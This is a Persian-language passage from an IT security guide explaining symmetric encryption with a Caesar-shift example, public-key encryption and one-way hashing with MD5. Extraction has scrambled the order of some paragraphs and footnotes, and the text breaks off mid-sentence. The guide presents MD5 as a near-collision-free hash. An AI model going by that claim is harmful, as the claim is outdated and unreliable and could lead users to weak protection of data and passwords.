‫ﻣﺨﺘﻠﻒ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺳـﻴﺐ ﺑﺒﻴﻨـﺪ‪Unicode .‬‬
‫ﺁﻣﺪﻩ ﺑﻮﺩ ﺗﺎ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ ﺣﻞ ﻛﻨﺪ‪.‬‬
‫‪137 Attachments‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫•‬
‫•‬
‫•‬
‫‪١٣٨‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬
‫‪١٤٠‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪Hash‬‬
‫‪١٣٩‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ‬
‫ﺑﻪ ﺯﺑﺎﻥ ﺳﺎﺩﻩ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻣﺸﺎﺑﻪ ﻛﺪﮔـﺬﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺣﺮﻭﻑ ﺍﺻﻠﻲ ﻣﺘﻦ ﻫﻤﮕﻲ ﺩﺭ ﺁﻥ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻣﻲﻳﺎﺑﻨﺪ‪ .‬ﻳﻜـﻲ‬
‫ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺣـﺮﻑ‬
‫ﺭﺍ ﺑﺎ ﺣﺮﻑ ﺑﻌﺪﻱ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﻴﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ‪:‬‬
‫‪ B‬ﺑﺠﺎﻱ ‪ A‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬
‫‪ C‬ﺑﺠﺎﻱ ‪ B‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬
‫‪ D‬ﺑﺠﺎﻱ ‪ C‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬
‫‪........‬‬
‫‪ Y‬ﺑﺠﺎﻱ ‪ X‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬
‫‪ Z‬ﺑﺠﺎﻱ ‪ Y‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬
‫‪ A‬ﺑﺠﺎﻱ ‪ Z‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﺩﺭ ﭘﺎﻳﺎﻥ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ‪ ،‬ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﺣـﺮﻑ ﺍﻭﻝ‬
‫ﺑﺎﺯﮔﺸﺘﻪﺍﻳﻢ(‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ‪ ،‬ﻣﺜـﺎﻝ ﺫﻛـﺮ ﺷـﺪﻩ ﺗﺒـﺪﻳﻞ‬
‫ﻣﻲﺷﻮﺩ ﺑﻪ )ﻓﺎﺻﻠﻪ ﻭ ﻧﻘﻄﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﮕﻴﺮﻳﺪ(‪:‬‬
‫‪TFDVSJUZ JT JNQPSUBOU.‬‬
‫‪138 Symmetric Encryption‬‬
‫‪139 Public Key Encryption‬‬
‫‪140 One-way Hash Encryption‬‬
‫‪١٠٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺍﻛﻨــﻮﻥ ﺍﻳــﻦ ﭘﻴــﺎﻡ ﺗﻐﻴﻴــﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ‪ .‬ﺩﺭﻳﺎﻓــﺖﻛﻨﻨــﺪﻩ ﺁﻧــﺮﺍ‬
‫ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﺣﺮﻑ ﻗﺒﻠﻲ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﻛﻨﺪ‬
‫ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﻳﻚ ﻭﺍﺣﺪ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴﻢ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﻢ ﺁﻧﻬﺎ‬
‫ﺭﺍ ﭼﻨﺪ ﻭﺍﺣﺪ ﻣﻨﺘﻘﻞ ﻛﻨﻴﻢ‪ .‬ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﻣﻘـﺪﺍﺭ ﺍﻳـﻦ‬
‫ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺳﺎﺩﻩ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺩﺯﺩﻳـﺪﻩ ﺷـﻮﺩ ﻭ‬
‫ﺳﺎﺭﻕ ﻣﺘﻮﺟﻪ ﺭﻭﺡ ﻛﻠﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺸﻮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺣﺪﺱ‬
‫ﺯﺩﻥ ﺑﺘﻮﺍﻧــﺪ ﻣﺤﺘــﻮﺍﻱ ﺁﻧــﺮﺍ ﺑﻔﻬﻤــﺪ‪ .‬ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﺍﻟﮕــﻮﺭﻳﺘﻢ‬
‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﺍﻋﻤﺎﻝ ﭼﻨﺪ ﺟﺎﺑﺠﺎﻳﻲ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﭘﻴﺪﺍ‬
‫ﻛﺮﺩ ﺁﻧﮕﺎﻩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻠﺘﺮ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺗﺎ ﻣﺪﺗﻲ ﭘﻴﺶ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻌـﺪﺩﻱ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺠـﺎﻱ ﺍﻧﺘﻘـﺎﻝ ﺣـﺮﻭﻑ ﺍﺯ ﻓﺮﻣﻮﻟﻬـﺎﻱ‬
‫ﺭﻳﺎﺿﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻟﺒﺘـﻪ ﻫﻨـﻮﺯ ﻫـﻢ ﺍﺯ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣــﻲﻛﻨــﻴﻢ ﻭ ﺍﻳــﻦ ﻛﻠﻴــﺪ ﺑﺨــﺸﻲ ﺍﺯ ﺁﻥ ﻓﺮﻣــﻮﻝ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﺣﺘﻤـﹰﺎ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﻠﻴـﺪ ﻣﺨـﺼﻮﺹ ﺭﺍ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻠﻴﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺍﻣﺘﺤﺎﻥ ﻛﻨﻴﺪ ﺗـﺎ ﺑـﻪ‬
‫ﺟﻮﺍﺏ ﺑﺮﺳﻴﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛﻠﻴﺪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ ۱‬ﺗﺎ ‪۱۰‬‬
‫ﻼ‬
‫ﺑﺎﺷﺪ‪ ،‬ﻋﻤﻠﻴﺎﺕ ﺣﺪﺱ ﺯﺩﻥ ﺯﻳﺎﺩ ﻃﻮﻝ ﻧﻤﻲﻛﺸﺪ‪ .‬ﺍﻣـﺎ ﺍﮔـﺮ ﻣـﺜ ﹰ‬
‫ﻣﻴﺎﻥ ﺍﻋﺪﺍﺩ ‪ ۱‬ﺗﺎ ‪ ۱۰۰‬ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻛﻤـﻲ ﺑﻴـﺸﺘﺮ ﺯﻣـﺎﻥ‬
‫ﻻ ﺍﻋﺪﺍﺩ ﺩﻭﺩﻭﻳﻲ ‪ ۱۲۸‬ﺑﻴﺘـﻲ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺑﺒﺮﺩ‪ .‬ﺍﻣﺮﻭﺯﻩ ﻛﻠﻴﺪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻳﻦ ﺭﻗﻢ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺮﺍﺑﺮ ﺑﺎ‪:‬‬
‫‪۳۴۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰‬‬
‫ﺍﻧﺘﺨﺎﺏ ﻣﺨﺘﻠﻒ ﺍﺳﺖ ﻛﻪ ﺣﺪﺱ ﺯﺩﻥ ﺻـﺤﻴﺢ ﻛﻠﻴـﺪ ﺭﺍ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﻏﻴﺮ ﻣﻤﻜﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻫﻨﮕﺎﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴـﺪ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨﺪ )ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺨﺺ ﺑﻪ ﺗﻮﺍﻓﻖ ﺭﺳـﻴﺪﻩ‬
‫‪141 Encryption Key‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﺎ ﻳـﻚ‬
‫ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ‪ :‬ﺑﺠﺎﻱ ﻳـﻚ ﻛﻠﻴـﺪ‪ ،‬ﺩﺭ ﺁﻥ ﺩﻭ ﻛﻠﻴـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺩﺭﻭﺍﻗﻊ ﺩﺭ ﺍﻳﻨﺠﺎ ﻛﻠﻴﺪﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﮔﺮﺩﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎ ﹺﻡ‬
‫ﻻ ﻛﻠﻴﺪ ﺍﻭﻝ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ ﻭ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻫﻤﻪ ﻣﺠﺎﺯﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ‬
‫ﺷﺨﺼﻲ ﻳﻚ ﭘﻴﺎﻡ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬
‫ﻭﻱ ‪ -‬ﻛﻪ ﺧﻮﺩ ﺍﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻫﻤﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ‬‫ﻭﻱ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﻛﻠﻴـﺪ ﺭﺍ‬
‫ﻧﺒﺎﻳﺪ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﺗﻮﺿﻴﺤﺎﺕ‬
‫ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ‬
‫ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﻮﺩ‪ ،‬ﻫﻴﭻ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﺑﺠـﺰ ﮔﻴﺮﻧـﺪﺓ‬
‫ﺣﻘﻴﻘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﺪ‪.‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺷﺨﺺ ﻣﻄﻤﺌﻦ‬
‫ﻧﻴﺴﺖ ﭼﻪ ﻛﺴﻲ ﭘﻴﺎﻡ ﺭﺍ ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩﺍﺳﺖ؛ ﺯﻳـﺮﺍ ﻫـﺮ‬
‫ﻛﺴﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻭﻱ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺍﻣـﺎ‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻣﻄﻤﺌﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺻﺎﺣﺐ ﺁﻥ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬
‫)ﻛﻠﻴﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﺭﻓﺘﻪ( ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ‬
‫ﻣﺘﻨﺎﻇﺮ ﺍﻳﻦ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻭ ﺑﺨﻮﺍﻧﺪ‪.‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻋﻜﺲ ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ‬
‫ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺑـﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ‬
‫ﺧﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺷـﻤﺎ ﺭﺍ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﭽـﻪ‬
‫ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻨـﹰﺎ ﻓﺮﺳـﺘﻨﺪﺓ ﭘﻴـﺎﻡ ﻛـﺴﻲ‬
‫ﻧﻴﺴﺖ ﺟﺰ ﺷﻤﺎ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺗﻌﺪﺍﺩ ﺗﻐﻴﻴﺮ ﻣﻜﺎﻥ ﻳﻚ ﺣﺮﻑ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ١٤١‬ﻣـﻲﮔﻮﻳﻨـﺪ‪.‬‬
‫ﺍﺯ ﺍﻳﻦ ﻋﺪﺩ ﻫﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﻫـﻢ‬
‫ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ‪ .‬ﺟﻮﻟﻴﻮﺱ ﺳﺰﺍﺭ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺭﺳـﺎﻝ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺳـﺮﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤـﻮﺩ )ﺍﻭ ﻛﻠﻴـﺪ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﺑﺮ ﻋﺪﺩ ‪ ۳‬ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩ ﺑﻮﺩ(‪.‬‬
‫ﺑﺎﺷﻨﺪ(‪ .‬ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭﺻﻮﺭﺗﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﻪ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻧﺘﻘﺎﻝ‬
‫ﻼ ﺍﻧﺘﻘﺎﻝ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺑـﻲﺳـﻴﻢ؛ ﻭ ﻳـﺎ ﺍﻳﻨﻜـﻪ‬
‫ﺩﻫﻴﺪ‪ ،‬ﻣﺜ ﹰ‬
‫ﺑﺨﻮﺍﻫﻴــﺪ ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺭﻭﻱ ﻳــﻚ ﺩﻳــﺴﻚ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺍﺭﺩ ﺍﺧﻴﺮ‬
‫ﺍﮔﺮ ﻛﻠﻴﺪ ﻣﻔﻘﻮﺩ ﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﻧﻴـﺰ ﻣﻄﻤﺌﻨـﹰﺎ ﺍﺯ ﺩﺳـﺖ‬
‫ﺭﻓﺘﻪﺍﻧﺪ‪.‬‬
‫‪١٠٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱ‬
‫‪١٤٢‬‬
‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺭﻭﺵ ﺭﺍ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺑﺪﺍﻧﻴـﺪ‬
‫ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻴﭽﻜﺲ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻧـﺪﺍﺭﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ‬
‫ﻣﻄﺎﻟﺐ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﻧﻤﻲ ﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ‬
‫ﮔﺮﺩﻧﺪ؛ ﻭ ﺗﻔﺎﻭﺕ ﺁﻥ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﻳـﻦ ﺍﺳـﺖ‬
‫ﻻ ﺣﺪﺍﻛﺜﺮ ﻃﻮﻝ ﻣﺸﺨﺼﻲ ﺩﺍﺭﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ‬
‫ﻛﻪ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍﻳﺠﺘــﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬــﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻳﻜﻄﺮﻓــﻪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺩﺭﻫــﻢﺳــﺎﺯﻱ‪ ،‬ﺍﻟﮕــﻮﺭﻳﺘﻤﻲ ﺑﻨــﺎﻡ ‪ ١٤٣MD5‬ﺍﺳــﺖ‪ .‬ﺧﺮﻭﺟــﻲ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ‪ ،MD5‬ﻫﻤﻴﺸﻪ ‪ ۱۲۸‬ﺑﻴﺖ )‪ ۱۶‬ﺑﺎﻳـﺖ( ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﻳﻚ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺑﺮﺍﻱ ﺩﻭ ﭘﻴـﺎﻡ ﻣﺘﻔـﺎﻭﺕ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﺧﺮﻭﺟﻲ ﺩﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﻣﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ‬
‫ﺑﺎﺷﻨﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺻﻔﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﺭﻭﺵ ﻭ ﻛﺪ ﺧﺮﻭﺟﻲ ﺗﻮﻟﻴﺪ ﺷـﺪﻩ ﺩﺭ ﺁﻥ ﺩﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﺻـﻠﻲ‬
‫ﺩﺍﺭﻧﺪ‪:‬‬
‫ﺗﻀﻤﻴﻦ ﺟﺎﻣﻌﻴﺖ‬
‫ﻳﻜﺴﺎﻥ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﻣـﺸﺨﺺ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺻﺤﻴﺢ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﻓﺮﺍﻣﻮﺵ‬
‫ﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ‬
‫ﻛﻨﺪ ﺭﻣﺰﮔﺸﺎﻳ ﹺ‬
